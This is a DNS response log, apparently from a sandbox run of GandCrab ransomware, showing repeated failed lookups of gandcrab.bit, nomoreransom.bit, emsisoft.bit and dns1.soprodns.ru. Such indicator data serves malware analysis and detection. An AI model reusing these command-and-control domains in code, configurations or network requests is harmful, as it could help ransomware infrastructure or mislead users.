Sep 1, 2022 00:02:19.471883059 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:19.491760969 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.512691975 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:19.925700903 CEST	8.8.8.8	192.168.2.3	0xeae8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.930727959 CEST	8.8.8.8	192.168.2.3	0xfea3	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.951675892 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:19.970587015 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.993907928 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:20.013947010 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:20.035240889 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:22.022486925 CEST	8.8.8.8	192.168.2.3	0xc65d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.050517082 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:22.069267035 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.074369907 CEST	8.8.8.8	192.168.2.3	0xc65d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.089488983 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:22.108500004 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:22.129991055 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:24.712889910 CEST	8.8.8.8	192.168.2.3	0x4e9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.748702049 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:24.770515919 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.792413950 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:24.814188957 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:24.833614111 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:26.233566046 CEST	8.8.8.8	192.168.2.3	0x7b7e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.270071030 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:26.293915987 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.312290907 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:26.332462072 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.352917910 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:26.714562893 CEST	8.8.8.8	192.168.2.3	0x4e9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:26.841078043 CEST	8.8.8.8	192.168.2.3	0x4e9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.386841059 CEST	8.8.8.8	192.168.2.3	0x7b7e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.784187078 CEST	8.8.8.8	192.168.2.3	0xd306	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.817483902 CEST	8.8.8.8	192.168.2.3	0xd306	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.877135992 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:27.904680967 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:27.926455975 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:27.989053965 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:28.014046907 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:30.826258898 CEST	8.8.8.8	192.168.2.3	0xefc8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.422898054 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:32.442924023 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.465111017 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:32.486720085 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:32.510637999 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:33.985611916 CEST	8.8.8.8	192.168.2.3	0xefc8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.407073975 CEST	8.8.8.8	192.168.2.3	0x4560	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.435112000 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:34.459167957 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.484791994 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:34.489913940 CEST	8.8.8.8	192.168.2.3	0x4560	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.517954111 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:34.537820101 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:35.427285910 CEST	8.8.8.8	192.168.2.3	0xbc32	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.454541922 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:35.475027084 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.496222973 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:35.516345024 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:35.536685944 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:35.984587908 CEST	8.8.8.8	192.168.2.3	0x55ac	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:36.012811899 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:36.034972906 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:36.053332090 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:36.071810961 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:36.091907978 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:38.631139994 CEST	8.8.8.8	192.168.2.3	0xf2bb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.659338951 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:38.680645943 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.701905012 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:38.738066912 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:38.759218931 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:39.027879000 CEST	8.8.8.8	192.168.2.3	0xf2bb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.143616915 CEST	8.8.8.8	192.168.2.3	0xf2bb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.675185919 CEST	8.8.8.8	192.168.2.3	0x7eea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.710722923 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:39.729000092 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.750302076 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:39.771075010 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:39.791596889 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:41.822036982 CEST	8.8.8.8	192.168.2.3	0x6727	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.861427069 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:41.881999969 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.902828932 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:41.921314955 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:41.941456079 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:42.283397913 CEST	8.8.8.8	192.168.2.3	0x6727	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.320070028 CEST	8.8.8.8	192.168.2.3	0x27ee	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.345973015 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:43.366689920 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.386923075 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:43.405071020 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:43.425419092 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:44.279233932 CEST	8.8.8.8	192.168.2.3	0xdd39	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.305149078 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:44.326653957 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.346456051 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:44.366677999 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.386941910 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:44.819075108 CEST	8.8.8.8	192.168.2.3	0x7cf8	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.846179008 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:44.864609003 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.886693001 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:44.908752918 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:44.929284096 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:46.625612020 CEST	8.8.8.8	192.168.2.3	0xa05d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.652822018 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:46.677609921 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.696248055 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:46.716310978 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:46.736613989 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:47.092792034 CEST	8.8.8.8	192.168.2.3	0xb75e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.096024036 CEST	8.8.8.8	192.168.2.3	0xa05d	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.119285107 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:47.137702942 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.159663916 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:47.179497957 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:47.199672937 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:47.295221090 CEST	8.8.8.8	192.168.2.3	0x27ee	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.169800997 CEST	8.8.8.8	192.168.2.3	0x9344	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.262660027 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:48.282622099 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.302493095 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:48.359857082 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:48.378109932 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:49.030847073 CEST	8.8.8.8	192.168.2.3	0x9098	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.060447931 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:49.125612974 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.145709991 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:49.164716959 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:49.230854988 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:51.666511059 CEST	8.8.8.8	192.168.2.3	0xc31f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.647394896 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:52.669127941 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.691092014 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:52.712511063 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:52.786346912 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:53.169249058 CEST	8.8.8.8	192.168.2.3	0xc31f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.199151039 CEST	8.8.8.8	192.168.2.3	0xddd1	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.227545977 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:53.250277996 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.274090052 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:53.296488047 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:53.315620899 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:54.707915068 CEST	8.8.8.8	192.168.2.3	0x1cca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.727380991 CEST	8.8.8.8	192.168.2.3	0x1cca	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.735213995 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:54.755316019 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.777358055 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:54.797842026 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:54.826921940 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:55.222019911 CEST	8.8.8.8	192.168.2.3	0x7331	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.248954058 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:55.282449961 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.303663969 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:55.325366020 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.344696999 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:55.919511080 CEST	8.8.8.8	192.168.2.3	0x8ac0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.952475071 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:55.974069118 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.995476007 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:56.016655922 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:56.038196087 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:57.439387083 CEST	8.8.8.8	192.168.2.3	0xc34e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.449079037 CEST	8.8.8.8	192.168.2.3	0xc34e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.467147112 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:57.488708973 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.511897087 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:57.530978918 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.561358929 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:00.010236025 CEST	8.8.8.8	192.168.2.3	0xe6aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.035882950 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:00.057038069 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.076392889 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:00.097615957 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.121129990 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:01.584554911 CEST	8.8.8.8	192.168.2.3	0x1ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.595273972 CEST	8.8.8.8	192.168.2.3	0x1ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.622442007 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:01.644107103 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.665334940 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:01.686562061 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.706001043 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:03:02.779787064 CEST	8.8.8.8	192.168.2.3	0x9670	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:02.821990013 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:02.843368053 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
